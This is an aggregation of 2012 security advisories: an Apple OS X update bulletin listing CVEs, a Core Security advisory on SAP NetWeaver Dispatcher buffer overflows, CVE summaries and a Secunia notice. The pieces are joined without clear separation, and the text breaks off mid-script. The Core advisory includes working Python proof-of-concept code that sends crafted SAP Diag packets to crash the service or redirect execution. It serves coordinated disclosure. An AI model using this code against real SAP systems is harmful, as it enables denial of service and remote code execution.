j4WkrzgVUIxCMrsWMMwu1SVaizBuTYbNVzCzV3JPF1H0zVtVKgwWjhTdOJ/RDksD sjZG1XIEqVyv1rNk5BtjxVPFaJGpf9mcHiH8XyKQ0bC6ToM2r3B++Layoc5k1K0V OxKGSfWOEbWi/KR6vlXyVbe7JnU7a/V0C25HXhnoMEtoTCleZACEByLVtBC87LU= =6Eiz -----END PGP SIGNATURE-----

Login Window in Apple Mac OS X 10.7.3, when Legacy File Vault or networked home directories are enabled, does not properly restrict what is written to the system log for network logins, which allows local users to obtain sensitive information by reading the log. Apple Mac OS X is prone to a local security-bypass vulnerability. Attackers can exploit this issue to bypass certain security restrictions and obtain sensitive account information. Note: This issue was previously discussed in BID 53445 (Apple Mac OS X Security Update 2012-002 Multiple Security Vulnerabilities) but has been given its own record to better document it. The login process recorded sensitive information in the system log, where other users of the system could read it. The sensitive information may persist in saved logs after installation of this update. See http://support.apple.com/kb/TS4272 for more information on how to securely remove any remaining records. By sending a maliciously crafted message, a remote attacker could cause the directory server to disclose memory from its address space, potentially revealing account credentials or other sensitive information. By sending a maliciously crafted packet, an unauthenticated remote attacker could cause a denial of service or arbitrary code execution with system privileges. Processing untrusted input with the Security framework could result in memory corruption. This issue does not affect 32-bit processes. Beginning with AirPort Base Station and Time Capsule Firmware Update 7.6, Time Capsules and Base Stations support a secure SRP-based authentication mechanism over AFP. However, Time Machine did not require that the SRP-based authentication mechanism was used for subsequent backup operations, even if Time Machine was initially configured or had ever contacted a Time Capsule or Base Station that supported it. An attacker who is able to spoof the remote volume could gain access to user's Time Capsule credentials, although not backup data, sent by the user's system. This issue is addressed by requiring use of the SRP-based authentication mechanism if the backup destination has ever supported it. CVE-ID CVE-2012-0675 : Renaud Deraison of Tenable Network Security, Inc. CVE-ID CVE-2011-2895 : Tomas Hoger of Red Hat Note: Additionally, this update filters dynamic linker environment variables from a customized environment property list in the user's home directory, if present. Further information is available via the Apache web site at http://httpd.apache.org/. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2011-3368 CVE-2011-3607 CVE-2011-4317 CVE-2012-0021 CVE-2012-0031 CVE-2012-0053 BIND Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: A remote attacker may be able to cause a denial of service in systems configured to run BIND as a DNS nameserver Description: A reachable assertion issue existed in the handling of DNS records. This issue was addressed by updating to BIND 9.7.6-P1. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2011-4313 BIND Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4, OS X Mountain Lion v10.8 and v10.8.1 Impact: A remote attacker may be able to cause a denial of service, data corruption, or obtain sensitive information from process memory in systems configured to run BIND as a DNS nameserver Description: A memory management issue existed in the handling of DNS records. This issue was addressed by updating to BIND 9.7.6-P1 on OS X Lion systems, and BIND 9.8.3-P1 on OS X Mountain Lion systems. CVE-ID CVE-2012-1667 CoreText Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Applications that use CoreText may be vulnerable to an unexpected application termination or arbitrary code execution Description: A bounds checking issue existed in the handling of text glyphs, which may lead to out of bounds memory reads or writes. This issue was addressed through improved bounds checking. CVE-ID CVE-2012-3716 : Jesse Ruderman of Mozilla Corporation Data Security Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4, OS X Mountain Lion v10.8 and v10.8.1 Impact: An attacker with a privileged network position may intercept user credentials or other sensitive information Description: TrustWave, a trusted root CA, has issued, and subsequently revoked, a sub-CA certificate from one of its trusted anchors. This sub-CA facilitated the interception of communications secured by Transport Layer Security (TLS). This update adds the involved sub-CA certificate to OS X's list of untrusted certificates. DirectoryService Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8 Impact: If the DirectoryService Proxy is used, a remote attacker may cause a denial of service or arbitrary code execution Description: A buffer overflow existed in the DirectoryService Proxy. This issue was addressed through improved bounds checking. This issue does not affect OS X Lion and Mountain Lion systems. CVE-ID CVE-2012-0650 : aazubel working with HP's Zero Day Initiative ImageIO Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted PNG image may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in libpng's handling of PNG images. These issues were addressed through improved validation of PNG images. These issues do not affect OS X Mountain Lion systems. CVE-ID CVE-2011-3026 : Juri Aedla CVE-2011-3048 ImageIO Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow issue existed in libTIFF's handling of TIFF images. This issue was addressed through improved validation of TIFF images. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-1173 : Alexander Gavrun working with HP's Zero Day Initiative Installer Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Remote admins and persons with physical access to the system may obtain account information Description: The fix for CVE-2012-0652 in OS X Lion 10.7.4 prevented user passwords from being recorded in the system log, but did not remove the old log entries. This issue was addressed by deleting log files that contained passwords. CVE-ID CVE-2012-0652 International Components for Unicode Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Applications that use ICU may be vulnerable to an unexpected application termination or arbitrary code execution Description: A stack buffer overflow existed in the handling of ICU locale IDs. This issue was addressed through improved bounds checking. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2011-4599 Kernel Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: A malicious program could bypass sandbox restrictions Description: A logic issue existed in the handling of debug system calls. This may allow a malicious program to gain code execution in other programs with the same user privileges. This issue was addressed by disabling handling of addresses in PT_STEP and PT_CONTINUE. This issue does not affect OS X Mountain Lion systems. This issue was addressed by preventing user-installed methods from being used when the system is handling login information. CVE-ID CVE-2012-3718 : An anonymous researcher Mail Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing an e-mail message may lead to execution of web plugins Description: An input validation issue existed in Mail's handling of embedded web plugins. This issue was addressed by disabling third- party plug-ins in Mail. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-3719 : Will Dormann of the CERT/CC Mobile Accounts Available for: OS X Mountain Lion v10.8 and v10.8.1 Impact: A user with access to the contents of a mobile account may obtain the account password Description: Creating a mobile account saved a hash of the password in the account, which was used to login when the mobile account was used as an external account. The password hash could be used to determine the user's password. This issue was addressed by creating the password hash only if external accounts are enabled on the system where the mobile account is created. CVE-ID CVE-2012-3720 : Harald Wagener of Google, Inc. Further information is available via the PHP web site at http://www.php.net CVE-ID CVE-2012-0831 CVE-2012-1172 CVE-2012-1823 CVE-2012-2143 CVE-2012-2311 CVE-2012-2386 CVE-2012-2688 PHP Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: PHP scripts which use libpng may be vulnerable to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the handling of PNG files. This issue was addressed by updating PHP's copy of libpng to version 1.5.10. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2011-3048 Profile Manager Available for: OS X Lion Server v10.7 to v10.7.4 Impact: An unauthenticated user could enumerate managed devices Description: An authentication issue existed in the Device Management private interface. This issue was addressed by removing the interface. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-3721 : Derick Cassidy of XEquals Corporation QuickLook Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted .pict file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the handling of .pict files. This issue was addressed through improved validation of .pict files. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-0671 : Rodrigo Rubira Branco (twitter.com/bsdaemon) from the Qualys Vulnerability & Malware Research Labs (VMRL) QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An integer overflow existed in QuickTime's handling of sean atoms. This issue was addressed through improved bounds checking. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-0670 : Tom Gallagher (Microsoft) and Paul Bates (Microsoft) working with HP's Zero Day Initiative QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: An uninitialized memory access existed in the handling of Sorenson encoded movie files. This issue was addressed through improved memory initialization. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-3722 : Will Dormann of the CERT/CC QuickTime Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: A buffer overflow existed in the handling of RLE encoded movie files. This issue was addressed through improved bounds checking. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-0668 : Luigi Auriemma working with HP's Zero Day Initiative Ruby Available for: Mac OS X 10.6.8, Mac OS X Server 10.6.8, OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of SSL 3.0 and TLS 1.0 when a cipher suite uses a block cipher in CBC mode. The Ruby OpenSSL module disabled the 'empty fragment' countermeasure which prevented these attacks. This issue was addressed by enabling empty fragments. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2011-3389 USB Available for: OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4 Impact: Attaching a USB device may lead to an unexpected system termination or arbitrary code execution Description: A memory corruption issue existed in the handling of USB hub descriptors. This issue was addressed through improved handling of the bNbrPorts descriptor field. This issue does not affect OS X Mountain Lion systems. CVE-ID CVE-2012-3723 : Andy Davis of NGS Secure Note: OS X Mountain Lion v10.8.2 includes the content of Safari 6.0.1. For further details see "About the security content of Safari 6.0.1" at http://http//support.apple.com/kb/HT5502 OS X Mountain Lion v10.8.2, OS X Lion v10.7.5 and Security Update 2012-004 may be obtained from the Software Update pane in System Preferences, or Apple's Software Downloads web site: http://www.apple.com/support/downloads/ The Software Update utility will present the update that applies to your system configuration. Only one is needed, either OS X Mountain Lion v10.8.2, OS X Lion v10.7.5 or Security Update 2012-004. For OS X Mountain Lion v10.8.1 The download file is named: OSXUpd10.8.2.dmg Its SHA-1 digest is: d6779e1cc748b78af0207499383b1859ffbebe33 For OS X Mountain Lion v10.8 The download file is named: OSXUpdCombo10.8.2.dmg Its SHA-1 digest is: b08f10233d362e39f20b69f91d1d73f5e7b68a2c For OS X Lion v10.7.4 The download file is named: MacOSXUpd10.7.5.dmg Its SHA-1 digest is: e0a9582cce9896938a7a541bd431862d93893532 For OS X Lion v10.7 and v10.7.3 The download file is named: MacOSXUpdCombo10.7.5.dmg Its SHA-1 digest is: f7a26b164fa10dae4fe646e57b01c34a619c8d9b For OS X Lion Server v10.7.4 The download file is named: MacOSXServerUpd10.7.5.dmg Its SHA-1 digest is: a891b03bfb4eecb745c0c39a32f39960fdb6796a For OS X Lion Server v10.7 and v10.7.3 The download file is named: MacOSXServerUpdCombo10.7.5.dmg Its SHA-1 digest is: df6e1748ab0a3c9e05c890be49d514673efd965e For Mac OS X v10.6.8 The download file is named: SecUpd2012-004.dmg Its SHA-1 digest is: 5b136e29a871d41012f0c6ea1362d6210c8b4fb7 For Mac OS X Server v10.6.8 The download file is named: SecUpdSrvr2012-004.dmg Its SHA-1 digest is: 9b24496be15078e58a88537700f2f39c112e3b28 Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.17 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBAgAGBQJQWhlbAAoJEPefwLHPlZEwwjwQAKrpQlZh1B2mkSTLxR7QZg6e Qm7SmIZL9sjl5gQkTxoAvOGxJ8uRdYPlJ1IpyU/MbK0GqO53KmFSeKkwCnvLKMaW pc6tiFaQ4zV4LEAwBAFEuqCsMyPEJqKDhYXl2cHQmWfAlrLCyCKfzGLy2mY2UnkE DQC2+ys70DChFv2GzyXlibBXAGMKDygJ5dVKynsi1ceZLYWbUJoGwlUtXPylBpnO QyGWXmEloPbhK6HJbKMNacuDdVcb26pvIeFiivkTSxPVlZ3ns2tAwEyvHrzA9O4n 7rQ6jvfDbguOZmM5sPFvVKBw2GVDBNU+G3T8ouIXhk6Pjhr4in8VFCb8MIMLb8hm 7YYn2z1TzKTNmUuYbwe6ukQvf57cPuW0bAvslbl6PgrzqorlNPU4rDoSvPrJx/RO BOYkcxfirevHDGibfkeqXPjL3h+bVrb1USZpAv+ZOAy0M89SHFcvMtpAhxnoGiV5 w4EyKB+9Yi/CSAk2Ne3Y5kHH7/v3pWV68aJwhVirya7ex3vnJ+M+lRLKSm2BUjL3 +9fykrJBDujFDXoCmK5CN5Wx36DSVZ4VO1h635crotudtcvd+LQ2VHma/Chav5wK q5SSllf4KEownpx6o/qTxpg5tcC4lvgTcsDHlYcNq2s8KTTjmOden8ar4h7M7QD2 xyBfrQfG/dsif6jGHaot =8joH -----END PGP SIGNATURE-----

SAP NetWeaver 7.0 allows Remote Code Execution and Denial of Service caused by an error in the DiagTraceHex() function. By sending a specially-crafted packet, an attacker could exploit this vulnerability to cause the application to crash. SAP NetWeaver There is an unspecified vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ SAP Netweaver Dispatcher Multiple Vulnerabilities 1. *Advisory Information* Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514 3. *Vulnerability Description* SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. The vulnerabilities are triggered sending specially crafted SAP Diag packets to remote TCP port 32NN (being NN the SAP system number) of a host running the "Dispatcher" service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information. Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities: 1. Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 2. Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities). 3. Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 7. *Credits* These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories . 8. *Technical Description / Proof of Concept Code* *NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). The following python script can be used to reproduce the vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args() def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize(sock): diagheader = "\x00\x10\x00\x00\x00\x00\x00\x00" user_connect = "\x10\x04\x02\x00\x0c\x00\x00\x00\xc8\x00\x00\x04\x4c\x00\x00\x0b\xb8" support_data = "\x10\x04\x0b\x00\x20" support_data+= "\xff\x7f\xfa\x0d\x78\xb7\x37\xde\xf6\x19\x6e\x93\x25\xbf\x15\x93" support_data+= "\xef\x73\xfe\xeb\xdb\x51\xed\x01\x00\x00\x00\x00\x00\x00\x00\x00" dpheader = "\xff\xff\xff\xff\x0a\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" dpheader+= struct.pack("I", len(diagheader + user_connect + support_data)) dpheader+= "\x00\xff\xff\xff\xff\xff\xff " dpheader+= "terminalXXXXXXX" dpheader+= "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" send_packet(sock, dpheader + diagheader + user_connect + support_data) def send_message(sock, message): diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" eom = "\x0c" send_packet(sock, diagheader + step + message + eom) # Connect and send initialization packet connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((options.hostname, options.port)) initialize(connection) receive(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. *SAP Netweaver DiagTraceR3Info Vulnerability* [CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver 'disp+work.exe' module process a specially crafted network packet. Malicious packets are processed by the vulnerable function 'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace is configured at levels 2 or 3 for the "Dialog processor" component of the "Dialog" work process handling the packet [2]. This vulnerability could allow a remote unauthenticated attacker to execute arbitrary code with the privileges of the user running the "Dispatcher" service. The following python code can be used to trigger the vulnerability: /----- crash = "X"*114 + "\xff\xff" # --> Unicode Address to call ! crash+= "Y"*32 crash = "\x10\x06\x20" + struct.pack("!H", len(crash)) + crash send_message(connection, crash) -----/ 8.2. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x04\x18\xff\xff\xff\xffCrash!" send_message(connection, crash) -----/ 8.3. The following python code can be used to trigger the vulnerability: /----- crash = "\x12\x09\x02\x00\x00\x00\x08" + "\x80"*8 send_message(connection, crash) -----/ 8.4. /----- crash = "\x10\x13\x09\x00\xFF\x12\x1A\x59\x51" send_message(connection, crash) -----/ 8.5. /----- crash = "\x10\x0c\x0e\x00\0a" + "A"*10 send_message(connection, crash) -----/ 8.6. /----- crash = "\x10\x0f\x01\x00\x11" + "A"*17 send_message(connection, crash) -----/ 9. *Report Timeline* . 2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012. 2012-01-24: Core sends an advisory draft with technical details. 2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible. 2012-02-21: First release date missed. 2012-02-22: Core asks for the status of the fix and notifies that the release date was missed. 2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012. 2012-02-23: Core re-schedules the advisory publication to May 8th. 2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix. 2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed. 2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received). 2012-05-07: Core asks again for the status of the fix. 2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8]. 2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information. 2012-05-08: Advisory CORE-2012-0123 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx [2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm [3] SAP's legal information, terms and conditions http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. [4] SAP security note 1687910 https://service.sap.com/sap/support/notes/1687910. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

The DiagTraceHex function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application

The DiagTraceR3Info function in the Dialog processor in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2, when a certain Developer Trace configuration is enabled, allows remote attackers to execute arbitrary code via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application

The DiagiEventSource function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: SAP NetWeaver Denial of Service and Code Execution Vulnerabilities SECUNIA ADVISORY ID: SA48980 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48980/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 RELEASE DATE: 2012-05-09 DISCUSS ADVISORY: http://secunia.com/advisories/48980/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/48980/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=48980 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Core Security Technologies has reported multiple vulnerabilities in SAP NetWeaver, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system. The vulnerabilities are reported in versions 7.0 EHP1 and 7.0 EHP2. Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ PROVIDED AND/OR DISCOVERED BY: Martin Gallo, Core Security Technologies. ORIGINAL ADVISORY: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . *Advisory Information* Title: SAP Netweaver Dispatcher Multiple Vulnerabilities Advisory ID: CORE-2012-0123 Advisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities Date published: 2012-05-08 Date of last update: 2012-05-08 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514 3. *Vulnerability Description* SAP Netweaver [1] is a technology platform for building and integrating SAP business applications. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note https://service.sap.com/sap/support/notes/1687910 regarding these issues. Contact SAP for further information. Martin Gallo proposed the following actions to mitigate the impact of the vulnerabilities: 1. Disable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 2. Restrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities). 3. Restrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). 7. *Credits* These vulnerabilities were discovered and researched by Martin Gallo from http://www.coresecurity.com/content/services-overview-core-security-consulting-services. The publication of this advisory was coordinated by Fernando Miranda from http://www.coresecurity.com/content/corelabs-advisories . 8. *Technical Description / Proof of Concept Code* *NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). The following python script can be used to reproduce the vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-l", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3200) (options, args) = parser.parse_args() def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) 